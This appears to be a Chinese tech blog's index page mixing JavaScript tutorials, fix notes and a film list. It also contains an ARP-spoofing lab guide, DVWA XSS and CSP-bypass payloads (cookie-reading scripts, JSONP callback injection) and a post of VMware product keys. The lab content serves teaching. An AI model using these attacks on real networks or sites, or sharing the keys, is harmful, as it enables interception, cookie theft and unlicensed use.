l1n6yun's Blog

记录学习的技能和遇到的问题

发表于

顶部选项

Top section

  • 切换网站”可将目前网站加入忽略列表(或从忽略列表中移除)。
  • 开启/关闭”可启用或停用扩展。
  • 点选按键下方的链接以修改快捷键
  • 若切换按键为灰色,则表示浏览器限制脚本注入当前网页。

滤镜设置

Filter settings

可调整各项滤镜数值,以适应您的屏幕参数和室内环境亮度。

个别网站设置

Custom settings

点击“仅适用于”按键将设置值设为仅应用于当前网站。

要使用该功能,请先单击按钮(该按钮将突出显示),然后根据当前网站的需要调整设置。 再次单击按钮以取消。

网站列表

Site list

  • 使用“反色列表”让 Dark Reader 仅对列表中的网站生效。
  • 使用“不反色列表”避免扩展应用于列表中的网站。
  • 可填入 google.commail.google.comgoogle.*google.com/maps 等等。
  • 点击“切换”按键将网站加入相应列表。

更多选项

More tab

  • 从列表选择字体(或在 Firefox 输入字体名称),勾选方框。
  • 调整文字描边
  • 选择主题生成模式

主题生成模式

Filter+ vs. Static vs. Dynamic mode

过滤+、静态、动态模式比较

  • 过滤”是 Dark Reader 最一开始的模式,基于 CSS 滤镜。 网页色彩会全部反转,再回复部分的颜色。 必须用到 GPU 的资源。 虽然渲染快速且有效,但有几个问题: 停用文字的子像素渲染(sub-pixel rendering)、 将已经是暗色的部分转成亮色、 大型页面会发生延迟、 Firefox 会无法渲染某些网页。
  • 过滤+”效果和“过滤”一样,但是基于 SVG 滤镜,

色彩处理得更好,让图片不那么呆板。 在 Firefox 上效果不佳。

  • 静态”会迅速生成基本样式表。
  • 动态”会深入分析网站的样式表、背景图片、向量图形。 在网页载入时会占用一些资源, 但能产生最好的视觉效果。 虽然动态模式还在开发中, 但已能顺利应用于许多现代化的网站。

底部选项

Bottom section

  • 阅读我们的隐私政策,关注我们的 Twitter
  • 捐赠”──若您喜欢这个扩展,请考虑支持活跃的 Dark Reader 开发团队。 群众募资由 Open Collective 主导,目前以 Stripe 处理帐款。
  • 新闻”──版本资讯和重要活动的通知。
  • 开发者工具”──对当前主题开启设置编辑器。

使用开发者工具

若您熟悉 CSS 选择器,欢迎对某些网站提供修正建议。 请阅读开发者工具的使用说明

常见问题

为何扩展要求读取网站数据的权限

扩展需要这些权限才能分析和修改网站的外观, 并判断是否要根据您的设置来停用或应用特殊规则。 我们不会插入广告,也不会搜集任何数据,或将数据送到任何地方。 该扩展是完全开源的,没有混淆的代码。 我们的获利是透明的——来自用户捐助。

网上应用店和设置的页面怎么还是白的

本扩展对这些页面没有权限。

新标签页和浏览器主题怎么还是白的

本扩展无法改变新标签页或浏览器外观(但 Firefox 60 以后可以)。 请从网上应用店下载其他暗色主题或新标签页扩展。

开启新标签页或浏览网站时屏幕会闪白光

当载入网页时,Chrome 预设会呈现浏览器主题的背景色, 所以您应该从网上应用店安装暗色主题。

扩展完全无效

如果您有安装其他类似的扩展,请先停用它们,再重新载入标签页。 点击 Dark Reader 图标,检查右上角按键是否已开启。 打开“网站列表”,确认已选取“不反色列表”。 若依然无效,则存在问题,请发 Email 给我们。

网站呈现错误或运行缓慢

请发 Email 告诉我们该网站网址、网页截图、您的操作系统和浏览器版本。 起码对知名网站,我们会试着调查原因。 也请试试看更改“主题生成模式”或使用“明亮模式”。 检查该网站是否不在“网站列表”选项下。

扩展在无痕模式下无效

开启“chrome://extensions”页面,找到“Dark Reader”,点击“在无痕模式下启用”。

扩展对本地文件无效

开启“chrome://extensions”页面,找到“Dark Reader”,点击“允许访问文件网址”。

在“过滤”模式下整个网站没有画面

若您是在 Mac OS 上使用 Chrome,请将 Mac OS 更新至 10.13,此举应该会更新显示驱动程序。 若您使用 Firefox,则很有可能是浏览器漏洞,请改用其他模式。

发表于

Async-Await

异步编程的最高境界,就是根本不用关心它异步。

async 函数就是隧道尽头的亮光,很多人认为它是异步操作的终极解决方案。

async-await 与 promise 的关系

不存在谁替代谁,因为 async-await 是寄生于 Promise。Generator 的语法糖。

async :声明一个方法是异步的

await :可以认为是 async wait 的简写,等待一个异步方法执行完成。

基本语法

1
2
3
4
5
async function demo(params){

}

demo()

async 函数返回的是一个 Promise 对象

必须了解的 AsyncFunction console.log(async function(){}.constructor)

在 Chrome 里申明这样一个函数,可以在控制台看到返回的其实就是一个 Promise 对象。

扩展需要了解的就是 Chrome 现在也支持 AsyncFunction , 可以在 Chrome 控制台测试:

1
2
console.log(async function(){}.constructor)
function AsyncFunction()

规则

  1. async 表示这是一个 async 函数,await 只能用在这个函数里面。
  2. await 表示在这里等待 Promise 对象返回结果后,在继续执行。
  3. await 后面跟着的应该是一个 Promise 对象(当然,其他返回值也没关系,只是会立即执行,不过那样就没有意义了)
1
2
3
4
5
async function demo() {
    let result = await Promise.resolve(123);
    console.log(result);
}
demo();

应用

Promise 虽然一方面解决了 callback 的回调地狱,但是相对的把回调“纵向发展”了,形成了一个回调链。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
function sleep(wait) {
    return new Promise((res, rej) => {
        setTimeout(() => {
            res(wait)
        }, wait)
    })
}

// 回调地狱
sleep(100).then(result01 => {
    return sleep(result01 + 100);
}).then(result02 => {
    return sleep(result02 + 100);
}).then(result03 => {
    console.log(result03); // 300
})

// 改成async/await写法就是
async function demo(){
    // await 是强制把异步变成了同步,这一句代码执行完,才会执行下一句
    let result01 = await sleep(100);
    let result02 = await sleep(result01 + 100);
    let result03 = await sleep(result02 + 100);
    return result03;
}

demo().then(result => {
    console.log(result);	// 300
});

错误处理

既然 .then(...) 不用写了,那么 .catch(...) 也不用写,可以直接用标准的 try catch 语法捕捉错误。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
let p = new Promise((resolve,reject)=>{
    setTimeout(()=>{
        reject('error')
    },1000)
})

async function demo(params){
    try{
        let result = await p;
    }catch(e){
        console.log(e)
    }
}

demo();	// error

这是基本的错误处理,但是当内部出现错一些错误时,和上面Promise有点类似,demo() 函数不会报错,函数需要catch回调捕捉吗,这就是内部错误被‘静默’处理了。

1
2
3
4
5
6
7
8
9
10
11
12
13
let p = new Promise((resolve,reject) => {
    setTimeout(() => {
        reject('error');
    },1000);
});

async function demo(params) {
    let result = await p;
}

demo().catch((err) => {
    console.log(err);
})

注意你的并行执行和循环

如果这你想异步发出AJAX请求,使用 await 代码会同步执行,所以 async/await 需要谨慎使用。

await in for 循环:await 的执行上下文必须是 async 函数

现在有一些 .forEach 或者 .map 的循环里,比如在 .forEach 里使用 await , 这时候的上下文就变成了 Array ,而不是 async function ,就会报错。这时候你就要想到是什么错误。

发表于

Promise 对象代表了未来将要发生的事件,用来传递异步操作的消息。简单来说就是一个容器,里面保存着某个未来才会结束的事件(通常是一个异步操作的结果)

简介

ECMAscript 6 原生提供了 Promise 对象。

Promise 对象代表了未来将要发生的事件,用来传递异步操作的消息。简单来说就是一个容器,里面保存着某个未来才会结束的事件(通常是一个异步操作的结果)

Promise 对象的基本语法:

1
2
3
4
var promise = new Promise(function(resolve, reject) {
    // 异步处理
    // 处理结束后、调用resolve 或 reject
});

特点

  1. 对象的状态不受外界影响

    Promise 对象表示一个异步操作,有三种状态

    • pending: 初始状态

    • fulfilled: 操作成功

    • rejected: 操作失败

  2. 一旦状态改变,就不会再变,状态就凝固了

列如:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
var promise = new Promise(function(resolve, reject) {
    resolve('success')
    console.log('after resolve')
    reject('error')
});

promise.then(result => {
   console.log(result);
});

promise.catch(result => {
    console.log(result);
})

// 运行结果
after resolve
success
Promise { <state>: "fulfilled", <value>: "success" }

resolve 后面的语句其实是可以执行的。那么为什么 reject 的状态信息在下面没有接受到呢?这就是 Promise 对象的状态凝固特点。new 出一个 Promise 对象时,这个对象的起始状态就是 pending 状态,再根据 resolvereject 返回 fulfilled 状态或 rejected 状态。

传递回调

Promise 对象可以调用 promise.then() 方法,传递 resolve , reject 方法的回调。

1
2
3
4
5
6
promise.then(onFulfilled, onRejected)
promise.then(onFulfilled)		// 只用于接受 resolve 处理
promise.then(null,onFulfilled)	// 只用于接受 reject 处理

// promise简化了对error的处理
promise.then(onFulfilled).catch(onRejected)

链式调用

我们来执行一段代码

1
2
3
4
5
6
7
8
9
10
11
12
13
let p = new Promise((resolve,reject) => {
    reject('reject');
});

let resultP = p.then(null,result => {
    console.log(result);
});

console.log(resultP);

// 运行结果
Promise { <state>: "pending" }
reject

js 的执行顺序就是这样,同步->异步->回调,在同步执行的时候,Promise 对象还处于 pending 的状态,也说明了这个 then 返回的是一个 Promise 对象。

而且必须在then里面给一个返回值,才能继续调用,否则undefined。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
let p = new Promise((resolve,reject) => {
    reject('error');
});

let resultP = p.then(null,result => {
    console.log(result);
    return 123;
});

// console.log(resultP);
resultP.then(tmp => {
    console.log(tmp);
})

// 运行结果
error
123

Promise.resolve()

将现有对象转为 Promise 对象的快捷方式。

传递一个普通的对象:

1
2
3
4
5
6
7
8
9
let p1 = Promise.resolve({name:'l1n6yun',age:'18'});
// Promise { <state>: "fulfilled", <value>: { name: "l1n6yun", age: "18" } }

p1.then(result => {
    console.log(result);
});

// 运行结果
Object { name: "l1n6yun",age:"18" }

如果是Promise对象呢,直接返回

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
let p = new Promise((resolve,reject) => {
    setTimeout(() => {
        resolve('success');
    },500);
});

let pp = Promise.resolve(p);

pp.then(result => {
    console.log(result);
});

console.log(pp == p);

// 运行结果
true
success

Promise.reject()

快速的获取一个拒绝状态的 Promise 对象。

1
2
3
4
5
6
7
8
9
10
11
12
13
let p = Promise.reject(123);

console.log(p);

p.then(result => {
    console.log(result);
}).catch(result => {
    console.log('catch',result);
})

// 运行结果
Promise { <rejected> 123 }
catch 123

Promise.all()

Promise.all() 方法用于对多个 Promise 实例包装成一个新的 Promise 实例。

1
2
3
4
5
6
7
8
9
10
11
let p1 = Promise.resolve(123);
let p2 = Promise.resolve('hello');
let p3 = Promise.resolve('success');


Promise.all([p1,p2,p3]).then(result => {
    console.log(result);
})

// 执行结果
Array(3) [ 123, "hello", "success" ]

成功之后就是数组类型,但所有状态都是成功状态才可以返回数组吗。如果其中有一个对象状态为 reject 就返回 reject 的状态值。

1
2
3
4
5
6
7
8
9
10
11
12
13
let p1 = Promise.resolve(123);
let p2 = Promise.resolve('hello');
let p3 = Promise.resolve('success');
let p4 = Promise.reject('error');

Promise.all([p1,p2,p4]).then(result => {
    console.log(result);
}).catch(result => {
    console.log(result);
});

// 执行结果
error
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//用sleep来模仿浏览器的AJAX请求
function sleep(wait) {
    return new Promise((res,rej) => {
        setTimeout(() => {
            res(wait);
        },wait);
    });
}

let p1 = sleep(500);
let p2 = sleep(500);
let p3 = sleep(1000);

Promise.all([p1,p2,p3]).then(result => {
    console.log(result);
    //.....
    //loading
});

Promise.race()

Promise.race() 同样是键多个 Promise 实例包装成一个新的 Promise 实例。

和 all 同样接受多个对象,不同的是 race 接受的对象中,哪个对象返回的快就返回哪个对象。

就如race直译的赛跑这样。如果对象其中有reject状态的,必须catch捕捉到,如果返回的够快,就返回这个状态。race最终返回的只有一个值。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
//用sleep来模仿浏览器的AJAX请求
function sleep(wait) {
    return new Promise((res,rej) => {
        setTimeout(() => {
            res(wait);
        },wait);
    });
}

let p1 = sleep(500);
let p0 = sleep(2000);

Promise.race([p1,p0]).then(result => {
    console.log(result);
});

let p2 = new Promise((resolve,reject) => {
    setTimeout(()=>{
        reject('error');
    },1000);
});

Promise.race([p0,p2]).then(result => {
    console.log(result);
}).catch(result => {
    console.log(result);
});

// 执行结果
500
error

异常处理

錯誤處理的聲音實在安靜,安靜得聽不見 from Nolan Lawson

当 promise 被明确拒绝时,会发生拒绝;但是如果是在构造函数回调中引发的错误,则会隐式拒绝。

为什么说安静,一个例子, Promise 内部的错误外界用 try-catch 捕捉不到

1
2
3
4
5
6
7
8
try {
    let p = new Promise((resolve, reject) => {
        throw new Error("I'm error");
        // reject(new Error("I'm Error"));
    });
}catch(e) {
    console.log('catch',e);
}

结果什么都没打印。
但是抛出的错误可以通过catch来捕捉:

1
2
3
4
5
6
7
8
9
10
11
12
13
// try {
    let p = new Promise((resolve, reject) => {
        throw new Error("I'm error");
        // reject(new Error("I'm Error"));
    });
// }catch(e) {
//     console.log('catch',e);
// }


p.catch(result => {
    console.log(result);
});

这样就捕捉到错误。所以:

建议在 Promise 的链的尾部必须要有个catch接着。

发表于

在使用hexo-admin插入图片时,我发现插入的图片显示错误,并且链接也有问题。

1
2
3
4
预期
![upload successful](/images/pasted-32.png)
实际
![upload successful](\\images\pasted-32.png\)

修复方法

修改 blog/node_modules/hexo-admin/api.js 文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
// filename = path.join(imagePath, filename)
filename = imagePath + '/' + filename	// 修改点
var outpath = path.join(hexo.source_dir, filename)

var dataURI = req.body.data.slice('data:image/png;base64,'.length)
var buf = new Buffer(dataURI, 'base64')
hexo.log.d(`saving image to ${outpath}`)
fs.writeFile(outpath, buf, function (err) {
    if (err) {
        console.log(err)
    }
    hexo.source.process().then(function () {
        res.done({
            // src: path.join(hexo.config.root + filename),
            src: filename,	// 修改点
            msg: msg
        })
    });
})

发表于

在使用电脑办公过程中,安装应用程序时难免会遇到无法正常安装或者无法正常启动的情况,这对我们使用电脑带来了诸多不便,那么遇到应用程序无法正常启动的问题要如何解决呢?
“应用程序无法正常启动”这个问题想必很多用户都遇到过吧,其实造成程序无法运行启动的原因很多,需要对出现的代码进行解读再来解决

以下是应用程序无法正常启动(0xc000007b)的详细解决方案:

第一种方案:SFC检查系统完整性来尝试修复丢失问题件

  1. 以管理员身份运行场面命令提示符
  2. 使用 sfc /scannow 命令进行系统扫描和修复
  3. 修复完成后,尝试应用程序是否可以正常运行

第二种方案:使用DirectX修复工具(推荐)

这款软件能自动完成校验、检测、修复、注册的功能,十分简便易用,修复完成之后,重启一般就可以解决这个问题。
下载地址:https://www.microsoft.com/zh-CN/download/confirmation.aspx?id=35

发表于

励志片的作用,就是在你顾虑、担心、犹豫的时候,踹你一脚,让你朝助力最大的方向狂奔。
这 45 部电影里藏着许多希望、激励和方向。相信总有一部能触碰到你的内心。

  1. 《肖生克的救赎》 希望总是在最无望的场地迸发着最美丽奇迹的火焰。

  2. 《当幸福来敲门》 幸福必须靠自己争取。

  3. 《阿甘正传》 每一个人的生命轨迹都是存在的,而且是独一无二的。

  4. 《三傻大闹宝莱坞》 追求卓越,成功就离你不远了

  5. 《风雨哈弗路》 努力中的你永远比你想象中的要幸运

  6. 《美丽心灵》 这是上帝对两位美丽心灵的赏赐

  7. 《叫我第一名》 影响自己最大的永远是自己

  8. 《奔腾年代》 一个人毕生想要追求的东西甚至比他的生命还重要

  9. 《放牛班的春天》 没有一个孩子是不可救药的

  10. 《勇敢的心》 看清人间,仍有勇气追求自由

  11. 《喜剧之王》 小人物也能有大梦想

  12. 《贫民窟的百万富翁》 一场对自我坚守的肯定报答

  13. 《死亡诗社》 我希望生活得有意义

  14. 《弱点》 人性存在弱点,我们才可能去期盼明天会更好

  15. 《美丽人生》 就算在最艰难最黑暗的日子也要保持阳光

  16. 《国王的演讲》 你相信一个结巴的人能登上大舞台演讲吗

  17. 《爆裂鼓手》 英语中,再没有哪两个词比“good job”更害人的

  18. 《洛奇》 要是你知道自己的价值,就去争取你的价值

  19. 《百万美元宝贝》 因为热情,我想我可以

  20. 《摔跤吧,爸爸》 正面应战吧,这是你生来的目的

  21. 《猜火车》 你不会愈来愈年轻,世界在变,你不能整天在这儿

  22. 《百元之恋》 跟生活死磕吧别放弃,怎么也要赢一次

  23. 《生活多美好》 不寄希望于他人,就是要靠自己的力量去改变

  24. 《千与千寻》 一直向前走。千万别向后看

  25. 《入殓师》 生如夏花般灿烂,死如秋叶般静美

  26. 《永不妥协》 自己选择的路就该一步一步的走完

  27. 《一球成名》 人因梦想而伟大

  28. 《中国合伙人》 成功者总是不约而同的配合着时代的需要

  29. 《跳出我天地》 你选择了一条路并不意味着放弃另外一条

  30. 《千钧一发》 我有书,我在脑海中旅行

  31. 《127小时》 那是对生命的热爱

  32. 《追梦赤子心》 继续跑,带着赤子的骄傲

  33. 《永无止境》 对于任何事情都不尽力去做就是在浪费才能

  34. 《华尔街之狼》 能取胜的人,总是在说“必须”如何“未来”如何

  35. 《钢琴家》 唯有用力反抗,才能战胜黑暗

  36. 《光荣之路》 如果你现在停下来,后面的生活就会一起停下来

  37. 《沙漠之花》 在你想要放弃是,想想为什么当初坚持走到了这里。

  38. 《寿司之神》 人需要竞争才能进步

  39. 《朝圣之路》 时刻带着自己的阳光

  40. 《白日梦想家》 没有冒险没有变动的生活总是很平庸

  41. 《麦克法兰》 最励志的跑步电影,适合所有年龄段跑者

  42. 《卡特教练》 最怕的不是别人看不起我们,最怕的是我们前途无量

  43. 《早间主播》 有梦想是好事儿

  44. 《闪光少女》 我喜欢萤火虫,因为它虽然弱小却能发光

  45. 《成为简奥斯丁》 精神之力不可摧

发表于

下载地址:https://www.vmware.com/products/workstation-pro/workstation-pro-evaluation.html
产品秘钥:

1
2
3
4
ZF3R0-FHED2-M80TY-8QYGC-NPKYF
YF390-0HF8P-M81RQ-2DXQE-M2UT6
ZF71R-DMX85-08DQY-8YMNC-PPHV8
FA1M0-89YE3-081TQ-AFNX9-NKUC0

发表于

ARP工具

arpspoof 是一款进行arp欺骗的工具,攻击者可以通过它来毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。ARP欺骗,是让目标主机的流量经过主机的网卡,再从网关出去,而网关也会把原本流入目标机的流量经过我得电脑。

1
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

ARP断网攻击

在实验之前我们首先要知道ARP断网攻击是局域网攻击,我们要保证目标主机必须和自己处于一个局域网内,且自己和目标主机网络应该是通的。

首先可以使用 nmap 扫描局域网中存活的地址,探测到的存活地址,就是我们的目标主机,然后使用 arpspoof 实施 ARP 欺骗。

upload successful

在使用arp欺骗前先开启Kali的IP转发

upload successful

链接目标机查看一下网络状态

upload successful

使用 ettercap 对数据进行抓取

upload successful

upload successful

发表于 分类于

漏洞简介

JavaScript 攻击这关比较特殊,目标是提交 “success” 这个词来通关。每个级别有不同的保护机制,需要分析前端 JS 代码绕过去。

JavaScript 运行在客户端,用户能看、能改、能调试,所以前端做的任何验证都不能算真正的安全。

Low 级别

看页面源码,JS 直接嵌在页面里:

1
2
3
4
function generate_token() {
    var phrase = document.getElementById("phrase").value;
    document.getElementById("token").value = md5(rot13(phrase));
}

逻辑很简单:

  1. 拿 phrase 输入框的值
  2. rot13 编码
  3. md5 哈希
  4. 填进 token 隐藏字段

页面上默认 phrase 是 “ChangeMe”,我们要改成 “success”。

攻击方法

打开控制台,两行搞定:

1
2
document.getElementById("phrase").value = "success";
generate_token();

然后点提交,通关。代码都摆在你面前了,想怎么改都行。

Medium 级别

Medium 把 JS 移到外部文件了,还压缩了一下:

1
<script src="/vulnerabilities/javascript/source/medium.js"></script>

攻击方法

方法一:直接看 JS 文件

开发者工具 Sources 面板或者 Network 面板都能看到这个 JS 文件的内容。

方法二:格式化压缩代码

Chrome 和 Firefox 都有 Pretty Print 功能,点那个 {} 按钮,压缩的代码就格式化好了。

upload successful

分析一下发现有个 setTimeout 延迟调用:

1
2
3
setTimeout(function () {
  do_elsesomething('XX')
}, 300);

方法三:直接调函数

1
2
document.getElementById("phrase").value = "success";
do_elsesomething("XX");

压缩只是让人读起来费劲,不是真正的安全措施。

High 级别

High 用了代码混淆,两个工具一起上:

  1. Dan’s Tools(打包)
  2. JavaScript Obfuscator Tool(混淆)

混淆后的代码看着就像乱码,但不是不能读。

攻击方法

方法一:在线反混淆

把混淆的代码丢到反混淆工具里,比如 deobfuscatejavascript.com。

upload successful

反混淆后的代码就清晰多了。

方法二:断点调试

在 Sources 面板设置断点,一步步执行,观察变量变化,搞清楚执行流程。

分析完发现有三个函数要按顺序调用:

1
2
3
function token_part_3(t, y = "ZZ") {}
function token_part_2(e = "YY") {}
function token_part_1(a, b) {}

方法三:控制台调用

1
2
3
document.getElementById("phrase").value = "success";
token_part_1('ABCD', 44);
token_part_2('XX');

混淆增加了逆向难度,但不是不能逆。

Impossible 级别

这关没有 Impossible 级别,官方说明是:

You can never trust the user and have to assume that any code sent to the user can be manipulated or bypassed and so there is no impossible level.

意思就是:

  • 发到客户端的代码都能被改
  • 前端验证本质上是不可靠的
  • 所以不存在 Impossible 级别

正确的做法

实践 说明
服务端验证 关键验证必须在服务端做
别暴露敏感信息 密码密钥别放前端
用 Session 敏感操作服务端验证身份
输入验证 服务端严格过滤

小结

前端 JavaScript 安全要点:

  1. 所有安全验证必须在服务端完成
  2. 敏感信息别放前端代码里
  3. 代码混淆只是增加逆向难度,不是安全措施
  4. 关键业务逻辑放服务端
  5. 记住:用户能看到的一切都不安全

发表于 分类于

漏洞简介

CSP(内容安全策略)是个防御 XSS 的好东西,限制网页能从哪加载资源。但如果配置不当,CSP 也能绕。

这关主要学怎么绕过配置不当的 CSP。

CSP 基础知识

常用指令

指令 说明
default-src 默认资源来源
script-src JS 来源
style-src CSS 来源
img-src 图片来源
connect-src AJAX 来源

示例配置

1
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com

意思就是默认只能加载同源资源,JS 只能从自己和 cdn.example.com 加载。

Low 级别

看 CSP 配置:

1
2
$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com 'unsafe-inline';";
header( $headerCSP );

允许从 pastebin.com 加载脚本,这就给了机会。

攻击方法

第一步:去 pastebin.com 写个恶意脚本

1
alert(document.cookie);

第二步:复制 raw 链接

1
https://pastebin.com/raw/xxxxx

第三步:注入

1
<script src="https://pastebin.com/raw/xxxxx"></script>

脚本执行了,CSP 绕过成功。白名单域名不是随便加的。

Medium 级别

Medium 的 CSP:

1
$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ssl.google-analytics.com https://pastebin.com;";

'unsafe-inline' 允许内联脚本,这配置约等于没有 CSP。

攻击方法

直接写内联脚本:

1
<script>alert(document.cookie)</script>

允许 'unsafe-inline' 就是给 XSS 大开方便之门,还不如不设 CSP。

High 级别

High 的 CSP 严格了:

1
2
$headerCSP = "Content-Security-Policy: script-src 'self';";
header( $headerCSP );

只允许同源脚本。但代码里有个 JSONP 接口:

1
2
3
4
5
if( isset( $_GET[ 'include' ] ) ) {
    $page[ 'body' ] .= "
        <script src='" . $_GET[ 'include' ] . "'></script>
    ";
}

include 参数可控,而且加载的是同源地址。

攻击方法

利用 JSONP 接口:

1
?include=http://localhost:8080/vulnerabilities/csp/source/jsonp.php?callback=alert(document.cookie)//

虽然加载的是同源脚本,但 callback 参数能注入代码,绕过 CSP。

Impossible 级别

Impossible 用了 nonce:

1
2
$headerCSP = "Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-" . $token . "';";
header( $headerCSP );

特点:

  1. default-src 'self' 默认只允许同源
  2. script-src 'nonce-xxx' 只允许带正确 nonce 的脚本执行
  3. nonce 是动态生成的,猜不到

这才是正确的 CSP 配置。

CSP 绕过方式

绕过方式 说明
白名单域名 利用被允许的域名托管脚本
'unsafe-inline' 允许内联脚本
'unsafe-eval' 允许 eval
JSONP 利用 利用 JSONP callback 执行代码
文件上传 上传脚本到同源

小结

CSP 配置要点:

  1. 白名单域名要谨慎,别加公共 CDN
  2. 别用 'unsafe-inline''unsafe-eval'
  3. 用 nonce 或 hash 验证脚本
  4. JSONP 接口要检查 callback 参数
  5. 定期审计 CSP 配置
0%